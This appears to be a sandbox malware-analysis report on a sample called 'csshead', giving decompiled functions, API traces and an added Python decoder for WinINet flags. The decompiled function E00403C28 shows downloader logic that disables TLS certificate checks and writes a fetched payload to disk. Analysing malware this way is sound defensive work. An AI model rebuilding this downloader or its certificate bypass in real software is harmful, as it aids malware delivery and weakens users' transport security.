    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,00000000,00421BE3,00000000,?,?,?,?,?,?,00000000,00000404), ref: 0041F1A2
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 81%
    			E0041F120(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
    				signed int _t8;
    				intOrPtr _t16;
    				intOrPtr _t20;
    				intOrPtr* _t24;
    				intOrPtr _t26;
    				struct _CRITICAL_SECTION* _t27;
    				void* _t32;
    				intOrPtr* _t33;
    
    				_t26 =  *0x442a30; // 0x0
    				_t27 = _t26 + 0x10;
    				_t32 = __ecx;
    				EnterCriticalSection(_t27);
    				_t1 = _t32 + 0x34; // 0x0
    				_t33 =  *_t1;
    				_t20 =  *((intOrPtr*)(_t33 + 8));
    				_t8 = 0;
    				if(_t20 <= 0) {
    					L6:
    					LeaveCriticalSection(_t27);
    					return 0;
    				} else {
    					_t24 =  *_t33;
    					_t16 = _a4;
    					while( *_t24 != _t16) {
    						_t8 = _t8 + 1;
    						_t24 = _t24 + 4;
    						if(_t8 < _t20) {
    							continue;
    						} else {
    							LeaveCriticalSection(_t27);
    							return 0;
    						}
    						goto L14;
    					}
    					if(_t8 != 0xffffffff) {
    						if(_t8 < 0 || _t8 >= _t20) {
    							RaiseException(0xc000008c, 1, 0, 0);
    							asm("int3");
    							asm("int3");
    							asm("int3");
    							asm("int3");
    							asm("int3");
    							asm("int3");
    							asm("int3");
    							asm("int3");
    							if(( *0x442b58 & 0x00000001) == 0) {
    								 *0x442b58 =  *0x442b58 | 0x00000001;
    								 *0x441384 = 1;
    								 *0x441378 = "ToolbarWindow32";
    								 *0x44137c = 0;
    								 *0x441380 = 0;
    								 *0x441388 = 0;
    								 *0x44138a = 0;
    								 *0x44138b = 0;
    								 *0x44138f = 0;
    								 *0x441393 = 0;
    								 *0x441397 = 0;
    								 *0x44139b = 0;
    								 *0x44139f = 0;
    								 *0x4413a3 = 0;
    								 *0x4413a7 = 0;
    								 *0x4413ab = 0;
    							}
    							return 0x441348;
    						} else {
    							LeaveCriticalSection(_t27);
    							return  *((intOrPtr*)( *((intOrPtr*)(_t33 + 4)) + _t8 * 4));
    						}
    					} else {
    						goto L6;
    					}
    				}
    				L14:
    			}

    APIs
    • EnterCriticalSection.KERNEL32(-00000010,?,?,?,0041F237,00000000,?,?,?,?,00419635,00000000,?,?,?), ref: 0041F12F
    • LeaveCriticalSection.KERNEL32(-00000010,?,?,?,0041F237,00000000,?,?,?,?,00419635,00000000,?,?,?), ref: 0041F156
    • LeaveCriticalSection.KERNEL32(-00000010,?,?,?,0041F237,00000000,?,?,?,?,00419635,00000000,?,?,?), ref: 0041F16C
    • LeaveCriticalSection.KERNEL32(-00000010,?,?,?,0041F237,00000000,?,?,?,?,00419635,00000000,?,?,?), ref: 0041F189
    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,?,?,0041F237,00000000,?,?,?,?,00419635,00000000,?), ref: 0041F1A2
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
    • GetClassNameA.USER32(?,00000007,00000007), ref: 0041645A
    • lstrcmp.KERNEL32(00436334,00000000), ref: 0041646A
    • GetClassNameA.USER32(?,00000007,00000007), ref: 0041649A
    • lstrcmp.KERNEL32(00436334,00000000), ref: 004164AA
    • CallNextHookEx.USER32(00442A54,?,?,?), ref: 004164D8
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000000,0000000D,?,?,004124FE), ref: 00421EB2
    • RtlAllocateHeap.NTDLL(00000000), ref: 00421EB9
    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,004124FE), ref: 00421EDD
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,004124FE), ref: 00421F05
    • RtlInterlockedPushEntrySList.NTDLL(00000000), ref: 00421F1C
      • Part of subcall function 00421E10: IsProcessorFeaturePresent.KERNEL32(0000000C,00421EA0,?,?,004124FE), ref: 00421E12
      • Part of subcall function 00421E10: RtlAllocateHeap.NTDLL(00000000), ref: 00421E44
      • Part of subcall function 00421E10: InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00421E5A
      • Part of subcall function 00421E10: HeapFree.KERNEL32(00000000,?,?,?,?,?,004124FE), ref: 00421E6A
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			E00401910(char* _a4, CHAR* _a8, int _a12) {
    				char _v260;
    				CHAR* _t9;
    				int _t13;
    				CHAR* _t14;
    				CHAR* _t15;
    				char* _t16;
    
    				_t15 = _a8;
    				_t14 = _t15;
    				if(_t15 != 0) {
    					_t13 = _a12;
    				} else {
    					_t14 =  &_v260;
    					_t13 = 0x104;
    				}
    				_t16 = _a4;
    				if(GetFileTitleA(_t16, _t14, _t13) == 0) {
    					if(_t15 != 0) {
    						goto L7;
    					} else {
    						return lstrlenA(_t14) + 1;
    					}
    				} else {
    					_t9 = PathFindFileNameA(_t16);
    					if(_t15 != 0) {
    						lstrcpynA(_t15, _t9, _t13);
    						L7:
    						return 0;
    					} else {
    						return lstrlenA(_t9) + 1;
    					}
    				}
    			}

    APIs
    • GetFileTitleA.COMDLG32(?,?,?), ref: 00401943
    • PathFindFileNameA.SHLWAPI(?), ref: 0040194F
    • lstrlenA.KERNEL32(00000000), ref: 0040195A
    • lstrcpynA.KERNEL32(?,00000000,?), ref: 0040196F
    • lstrlenA.KERNEL32(?), ref: 00401987
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0042D0F9
    • GetCurrentProcessId.KERNEL32 ref: 0042D105
    • GetCurrentThreadId.KERNEL32 ref: 0042D10D
    • GetTickCount.KERNEL32 ref: 0042D115
    • QueryPerformanceCounter.KERNEL32(?), ref: 0042D121
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			E00409330(void* __ecx) {
    				long _t3;
    				void* _t5;
    				intOrPtr _t8;
    				struct _CRITICAL_SECTION* _t9;
    				intOrPtr* _t11;
    				void* _t12;
    				intOrPtr* _t13;
    				void* _t14;
    				intOrPtr _t15;
    
    				_t8 =  *0x442a30; // 0x0
    				_t9 = _t8 + 0x10;
    				_t14 = __ecx;
    				EnterCriticalSection(_t9);
    				_t3 = GetCurrentThreadId();
    				_t11 =  *((intOrPtr*)(_t14 + 0x34));
    				_t15 =  *((intOrPtr*)(_t11 + 8));
    				_t12 = 0;
    				if(_t15 <= 0) {
    					L6:
    					LeaveCriticalSection(_t9);
    					return 0;
    				} else {
    					_t13 =  *_t11;
    					while( *_t13 != _t3) {
    						_t12 = _t12 + 1;
    						_t13 = _t13 + 4;
    						if(_t12 < _t15) {
    							continue;
    						} else {
    							LeaveCriticalSection(_t9);
    							return 0;
    						}
    						goto L8;
    					}
    					if(_t12 != 0xffffffff) {
    						_t5 = L00411990(_t11, _t12);
    						LeaveCriticalSection(_t9);
    						return _t5;
    					} else {
    						goto L6;
    					}
    				}
    				L8:
    			}

    APIs
    • EnterCriticalSection.KERNEL32(-00000010), ref: 0040933F
    • GetCurrentThreadId.KERNEL32 ref: 00409345
    • LeaveCriticalSection.KERNEL32(-00000010), ref: 0040936F
    • LeaveCriticalSection.KERNEL32(-00000010), ref: 00409383
    • LeaveCriticalSection.KERNEL32(-00000010,00000000), ref: 00409398
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
    • __CreateFrameInfo.LIBCMT ref: 0042A553
      • Part of subcall function 004241AB: __getptd.LIBCMT ref: 004241B9
      • Part of subcall function 004241AB: __getptd.LIBCMT ref: 004241C7
    • __getptd.LIBCMT ref: 0042A55D
      • Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB
    • __getptd.LIBCMT ref: 0042A56B
    • __getptd.LIBCMT ref: 0042A579
    • __getptd.LIBCMT ref: 0042A584
      • Part of subcall function 00424250: __CallSettingFrame@12.LIBVCRUNTIME ref: 0042429C
      • Part of subcall function 0042A651: __getptd.LIBCMT ref: 0042A660
      • Part of subcall function 0042A651: __getptd.LIBCMT ref: 0042A66E
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
      • Part of subcall function 00425D30: TlsGetValue.KERNEL32(00000000,00425E89,?,?,00417F96,00000009), ref: 00425D39
      • Part of subcall function 00425D30: RtlDecodePointer.NTDLL ref: 00425D4B
      • Part of subcall function 00425D30: TlsSetValue.KERNEL32(00000000,?,?,00417F96,00000009), ref: 00425D5A
      • Part of subcall function 00425F05: InterlockedDecrement.KERNEL32(?), ref: 00425FA3
      • Part of subcall function 00423C10: __getptd.LIBCMT ref: 00423C1C
      • Part of subcall function 00423C10: __XcptFilter.LIBCMT ref: 00423C3D
      • Part of subcall function 0042A124: Sleep.KERNEL32(00000000), ref: 0042A14C
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    • ___fls_getvalue@4.LIBCMT ref: 00423C62
      • Part of subcall function 00425D10: TlsGetValue.KERNEL32(?,?,00423C67,00000000), ref: 00425D1E
    • ___fls_setvalue@8.LIBCMT ref: 00423C75
      • Part of subcall function 00425D64: RtlDecodePointer.NTDLL(?), ref: 00425D75
    • GetLastError.KERNEL32(00000000,?,00000000), ref: 00423C7E
    • RtlExitUserThread.NTDLL(00000000), ref: 00423C85
    • GetCurrentThreadId.KERNEL32 ref: 00423C8B
    • __getptd.LIBCMT ref: 00423CF4
      • Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB
      • Part of subcall function 00425DBE: GetModuleHandleW.KERNEL32(00436FF4,0043CE18,00000008,00425EC6,00000000,00000000,?,?,00417F96,00000009), ref: 00425DCF
      • Part of subcall function 00425DBE: InterlockedIncrement.KERNEL32(004418D8), ref: 00425E10
    • CreateThread.KERNEL32(?,?,00423C51,00000000,?,?), ref: 00423D2B
    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00423D35
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 83%
    			E00423C51(void* __ebx, void* __edi, void* __fp0, long _a4, char _a8, intOrPtr _a12, long _a16, DWORD* _a20) {
    				struct _SECURITY_ATTRIBUTES* _v0;
    				void* __esi;
    				void* __ebp;
    				void* _t23;
    				void* _t29;
    				DWORD* _t34;
    				void* _t39;
    				void* _t42;
    				long _t45;
    				void* _t55;
    				struct _SECURITY_ATTRIBUTES* _t56;
    				intOrPtr* _t58;
    				void* _t59;
    
    				_t67 = __fp0;
    				_t55 = __edi;
    				_t42 = __ebx;
    				_push(_t58);
    				L00425D30();
    				_t23 = E00425D10(L00425D2A());
    				if(_t23 != 0) {
    					_t45 = _a4;
    					 *((intOrPtr*)(_t23 + 0x54)) =  *((intOrPtr*)(_t45 + 0x54));
    					 *((intOrPtr*)(_t23 + 0x58)) =  *((intOrPtr*)(_t45 + 0x58));
    					_t52 =  *((intOrPtr*)(_t45 + 4));
    					_push(_t45);
    					 *((intOrPtr*)(_t23 + 4)) =  *((intOrPtr*)(_t45 + 4));
    					L00425F05(__ebx, __edi, _t58, __eflags, __fp0);
    				} else {
    					_t58 = _a4;
    					_t39 = L00425D64(L00425D2A(), _t58);
    					_t65 = _t39;
    					if(_t39 == 0) {
    						ExitThread(GetLastError());
    					}
    					 *_t58 = GetCurrentThreadId();
    				}
    				L00423C10(_t42, _t55, _t58, _t65, _t67);
    				asm("int3");
    				_push(_t42);
    				_push(_t55);
    				_t56 = _v0;
    				_t43 = 0;
    				_t66 = _t56;
    				if(_t56 != 0) {
    					_push(_t58);
    					L00425D30();
    					_t59 = E0042A124(1, 0x214);
    					__eflags = _t59;
    					if(__eflags == 0) {
    						L13:
    						E00422804(_t59);
    						__eflags = _t43;
    						if(_t43 != 0) {
    							L004251DE(_t43);
    						}
    						_t29 = 0;
    						__eflags = 0;
    					} else {
    						_push( *((intOrPtr*)(L00425EEB(0, _t52, __eflags) + 0x6c)));
    						_push(_t59);
    						L00425DBE(0, _t56, _t59, __eflags, _t67);
    						 *(_t59 + 4) =  *(_t59 + 4) | 0xffffffff;
    						 *((intOrPtr*)(_t59 + 0x58)) = _a12;
    						_t34 = _a20;
    						 *((intOrPtr*)(_t59 + 0x54)) = _t56;
    						__eflags = _t34;
    						if(_t34 == 0) {
    							_t34 =  &_a8;
    						}
    						_t29 = CreateThread(_v0, _a4, E00423C51, _t59, _a16, _t34);
    						__eflags = _t29;
    						if(_t29 == 0) {
    							_t43 = GetLastError();
    							goto L13;
    						}
    					}
    				} else {
    					 *((intOrPtr*)(L004251B8(_t66))) = 0x16;
    					L00425166();
    					_t29 = 0;
    				}
    				return _t29;
    			}

    Instruction addresses (the report's per-statement address column, one entry per statement line of the C code above, in order; 0x00000000 marks a line with no instruction of its own): 0x00423c51 0x00423c51 0x00423c51 0x00423c56 0x00423c57 0x00423c62 0x00423c69 0x00423c95 0x00423c9b 0x00423ca1 0x00423ca4 0x00423ca7 0x00423ca8 0x00423cab 0x00423c6b 0x00423c6b 0x00423c75 0x00423c7a 0x00423c7c 0x00423c85 0x00423c85 0x00423c91 0x00423c91 0x00423cb0 0x00423cb5 0x00423cbb 0x00423cbc 0x00423cbd 0x00423cc0 0x00423cc2 0x00423cc4 0x00423cda 0x00423cdb 0x00423cec 0x00423cf0 0x00423cf2 0x00423d3d 0x00423d3e 0x00423d44 0x00423d46 0x00423d49 0x00423d4e 0x00423d4f 0x00423d4f 0x00423cf4 0x00423cf9 0x00423cfc 0x00423cfd 0x00423d05 0x00423d09 0x00423d0c 0x00423d11 0x00423d14 0x00423d16 0x00423d18 0x00423d18 0x00423d2b 0x00423d31 0x00423d33 0x00423d3b 0x00000000 0x00423d3b 0x00423d33 0x00423cc6 0x00423ccb 0x00423cd1 0x00423cd6 0x00423cd6 0x00423d55

    APIs
      • Part of subcall function 00425D30: TlsGetValue.KERNEL32(?,00425E89), ref: 00425D39
      • Part of subcall function 00425D30: DecodePointer.KERNEL32 ref: 00425D4B
      • Part of subcall function 00425D30: TlsSetValue.KERNEL32(00000000), ref: 00425D5A
    • ___fls_getvalue@4.LIBCMT ref: 00423C62
      • Part of subcall function 00425D10: TlsGetValue.KERNEL32(?,?,00423C67,00000000), ref: 00425D1E
    • ___fls_setvalue@8.LIBCMT ref: 00423C75
      • Part of subcall function 00425D64: DecodePointer.KERNEL32(?,?,?,00423C7A,00000000,?,00000000), ref: 00425D75
    • GetLastError.KERNEL32(00000000,?,00000000), ref: 00423C7E
    • ExitThread.KERNEL32 ref: 00423C85
    • GetCurrentThreadId.KERNEL32 ref: 00423C8B
      • Part of subcall function 00425F05: InterlockedDecrement.KERNEL32(?), ref: 00425FA3
      • Part of subcall function 00423C10: __getptd.LIBCMT ref: 00423C1C
      • Part of subcall function 00423C10: __XcptFilter.LIBCMT ref: 00423C3D
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(0043A498), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
      • Part of subcall function 0042A0DF: Sleep.KERNEL32(00000000,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6,?,?,?,00425E08,0000000D), ref: 0042A100
    • __isleadbyte_l.LIBCMT ref: 0042B7B9
    • _strlen.LIBCMT ref: 0042B8D3
    • __aulldvrm.INT64 ref: 0042BC12
    • _write_string.LIBCMT ref: 0042BD55
    • _write_string.LIBCMT ref: 0042BE26
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
      • Part of subcall function 0042FF3F: __isleadbyte_l.LIBCMT ref: 0042FFA6
      • Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,?,00000000,00000000,?,?,?,?,00422655), ref: 0042FFD7
      • Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,00000001,00000000,00000000,?,?,?,?,00422655), ref: 00430045
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 98%
    			E00403C28(intOrPtr __eax, void* __ecx, CHAR* __edx) {
    				intOrPtr _v8;
    				CHAR* _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				long _v32;
    				char _v36;
    				char _v40;
    				intOrPtr _v44;
    				long _v48;
    				void* _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				signed char _v68;
    				signed int _v72;
    				char _v201;
    				char _v458;
    				void _v1483;
    				signed int _t88;
    				intOrPtr _t93;
    				void* _t94;
    				intOrPtr _t162;
    				intOrPtr _t165;
    				void* _t175;
    				void* _t180;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = 0;
    				_t176 =  *0x40b7a4;
    				if( *0x40b7a4 == 0) {
    					E00403A04(_t176);
    				}
    				_t162 =  *0x40a1a4; // 0x401ec0
    				_t88 = E00401110(_v8, _t162);
    				asm("sbb eax, eax");
    				_v68 =  ~(_t88 & 0xffffff00 | _t88 == _v8);
    				_v56 = E00401110(_v8, E00403E98);
    				if(_v56 != 0) {
    					_v56 = _v56 + 2;
    					_v60 = E00401110(_v56, 0x403e9c);
    					_v32 = _v60 - _v56;
    					E004012B8( &_v201, _v32, _v56);
    					 *((char*)(_t175 + _v32 - 0xc5)) = 0;
    					E00401308( &_v458, _v60);
    				}
    				_t93 =  *0x40a298; // 0x0
    				_t94 = _t93 - 1;
    				_t180 = _t94;
    				if(_t180 < 0) {
    					_v64 = 0;
    				} else {
    					if(_t180 == 0) {
    						_v64 = 0;
    					} else {
    						if(_t94 == 1) {
    							_v64 = 1;
    						}
    					}
    				}
    				_v20 = E00403864(0x40b7a4, _v64, 0, 0, 0);
    				if(_v68 == 0) {
    					_v72 = 0x50;
    				} else {
    					_v72 = 0x1bb;
    				}
    				_v24 = E0040161C(_v20, _v72,  &_v201, 0, 0, 3, 0, 0);
    				if(_v68 == 0) {
    					_v72 = 0x4400000;
    				} else {
    					_v72 = 0x4c03000;
    				}
    				_t165 =  *0x40a244; // 0x4020b8
    				_v28 = E00401660(_v24,  &_v458, _t165, 0, _v72, 0, 0, 0);
    				if(_v68 != 0) {
    					_v32 = 4;
    					E004016D8(_v28,  &_v72, 0x1f,  &_v32);
    					_v72 = _v72 | 0x00000100;
    					E0040170C(_v28,  &_v72, 0x1f, 4);
    				}
    				E004015E4(_v28, 0, 0, 0, 0);
    				_v32 = 4;
    				_v36 = 0;
    				_v40 = 0;
    				E004039CC(_v28,  &_v36, 0x20000013,  &_v40,  &_v32);
    				if(_v36 != 0xc8) {
    					L24:
    					E0040151C(_v28);
    					E0040151C(_v24);
    					E0040151C(_v20);
    					return _v16;
    				} else {
    					_v52 = CreateFileA(_v12, 0x40000000, 0, 0, 2, 0x80, 0);
    					if(_v52 == 0xffffffff) {
    						goto L24;
    					} else {
    						goto L21;
    					}
    					do {
    						L21:
    						_v44 = E004016A4(_v28, 0,  &_v32, 0);
    						E004015B0(_v28, 0x401,  &_v1483,  &_v32);
    						WriteFile(_v52,  &_v1483, _v32,  &_v48, 0);
    					} while (_v32 != 0 || _v44 == 0);
    					CloseHandle(_v52);
    					_v16 = 0xffffffff;
    					goto L24;
    				}
    			}

    Instruction addresses (the report's per-statement address column, one entry per statement line of the C code above, in order; 0x00000000 marks a line with no instruction of its own): 0x00403c31 0x00403c34 0x00403c39 0x00403c3c 0x00403c43 0x00403c45 0x00403c45 0x00403c4a 0x00403c53 0x00403c60 0x00403c62 0x00403c72 0x00403c79 0x00403c81 0x00403c91 0x00403c9a 0x00403ca9 0x00403cb1 0x00403cc2 0x00403cc2 0x00403cc7 0x00403ccc 0x00403ccc 0x00403ccf 0x00403cda 0x00403cd1 0x00403cd1 0x00403ce1 0x00403cd3 0x00403cd4 0x00403ce6 0x00403ce6 0x00403cd4 0x00403cd1 0x00403d01 0x00403d08 0x00403d13 0x00403d0a 0x00403d0a 0x00403d0a 0x00403d36 0x00403d3d 0x00403d48 0x00403d3f 0x00403d3f 0x00403d3f 0x00403d61 0x00403d6f 0x00403d76 0x00403d78 0x00403d8e 0x00403d93 0x00403da7 0x00403da7 0x00403db7 0x00403dbc 0x00403dc5 0x00403dca 0x00403de0 0x00403dec 0x00403e78 0x00403e7b 0x00403e83 0x00403e8b 0x00403e96 0x00403df2 0x00403e0e 0x00403e15 0x00000000 0x00000000 0x00000000 0x00000000 0x00403e17 0x00403e17 0x00403e26 0x00403e3b 0x00403e55 0x00403e5b 0x00403e6b 0x00403e71 0x00000000 0x00403e71

    APIs
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00403E08
    • WriteFile.KERNEL32(000000FF,?,00000004,?,00000000), ref: 00403E55
    • CloseHandle.KERNEL32(000000FF), ref: 00403E6B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
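The constants in E00403C28 above are enough to read its network behaviour even though the wrappers it calls (E0040161C, E00401660, E004016D8, E0040170C, E004039CC, E004016A4, E004015B0) are not resolved on this page. The branch chosen on _v68 picks port 0x50 (80) with flags 0x4400000 or port 0x1bb (443) with flags 0x4c03000 plus a read-modify-write of option 0x1f that ORs in 0x100; the response is then queried with 0x20000013 and only a status of 0xc8 (200) leads to the CreateFileA(GENERIC_WRITE, CREATE_ALWAYS) / WriteFile loop. Those are WinINet's values: 0x4c03000 is INTERNET_FLAG_SECURE | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_IGNORE_CERT_CN_INVALID | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, 0x1f is INTERNET_OPTION_SECURITY_FLAGS, 0x100 is SECURITY_FLAG_IGNORE_UNKNOWN_CA, and 0x20000013 is HTTP_QUERY_FLAG_NUMBER | HTTP_QUERY_STATUS_CODE. The script below is an added example, not part of the Joe Sandbox report or of the sample: it decodes the two flag words and states which certificate checks the HTTPS branch switches off. That the wrappers are HttpOpenRequest / InternetQueryOption / InternetSetOption / HttpQueryInfo is an assumption drawn from the constant values; the report does not name them.

```python
"""Decode the WinINet flag words hard-coded in E00403C28.

Added example, not part of the Joe Sandbox report or of the sample. Assumption:
the unresolved wrappers E00401660 / E004016D8 / E0040170C / E004039CC behave like
HttpOpenRequest / InternetQueryOption / InternetSetOption / HttpQueryInfo; the
constant values below are WinINet's own (wininet.h).
"""
from typing import Dict, List, Tuple

INTERNET_FLAGS: Dict[int, str] = {            # HttpOpenRequest dwFlags
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00008000: "INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP",
    0x00004000: "INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI",
}
SECURITY_FLAGS: Dict[int, str] = {            # INTERNET_OPTION_SECURITY_FLAGS (0x1f) value bits
    0x00002000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x00000100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x00000080: "SECURITY_FLAG_IGNORE_REVOCATION",
}
HTTP_QUERY_FLAG_NUMBER = 0x20000000
HTTP_QUERY_STATUS_CODE = 19

# (port, HttpOpenRequest flags, bits OR'd into the security option) for the two
# branches E00403C28 selects on _v68; all values are read off the decompilation.
BRANCHES = {"http": (0x50, 0x4400000, 0), "https": (0x1bb, 0x4c03000, 0x100)}

def decode(value: int, table: Dict[int, str]) -> Tuple[List[str], int]:
    """Split a flag word into the known names and the leftover (unrecognised) bits."""
    names = [name for bit, name in table.items() if value & bit]
    leftover = value & ~sum(bit for bit in table if value & bit)
    return names, leftover

def decode_http_query(info_level: int) -> Tuple[int, bool]:
    """HttpQueryInfo dwInfoLevel -> (HTTP_QUERY_* index, result delivered as a number?)."""
    return info_level & 0xFFFF, bool(info_level & HTTP_QUERY_FLAG_NUMBER)

def cert_checks_disabled(open_flags: int, security_flags: int) -> List[str]:
    """Certificate checks switched off for a request opened with open_flags whose
    security option was then OR'd with security_flags. WinINet accepts the CN and
    date overrides in either place; the CA and revocation overrides only via the option."""
    if not open_flags & 0x00800000:
        return ["plaintext: no TLS at all"]
    both = open_flags | security_flags
    off = []
    if both & 0x1000:
        off.append("hostname mismatch accepted")
    if both & 0x2000:
        off.append("expired or not-yet-valid certificate accepted")
    if security_flags & 0x100:
        off.append("unknown / untrusted CA accepted")
    if security_flags & 0x80:
        off.append("revocation ignored")
    return off

def audit(branch: str) -> Dict[str, object]:
    port, open_flags, sec_bits = BRANCHES[branch]
    names, leftover = decode(open_flags, INTERNET_FLAGS)
    return {"port": port, "flags": names, "unknown_bits": leftover,
            "security_option": decode(sec_bits, SECURITY_FLAGS)[0],
            "disabled_checks": cert_checks_disabled(open_flags, sec_bits)}

if __name__ == "__main__":
    for branch in BRANCHES:
        print(branch, audit(branch))
    print("status query 0x20000013 ->", decode_http_query(0x20000013), "; accepted status 0xc8 = 200")
```

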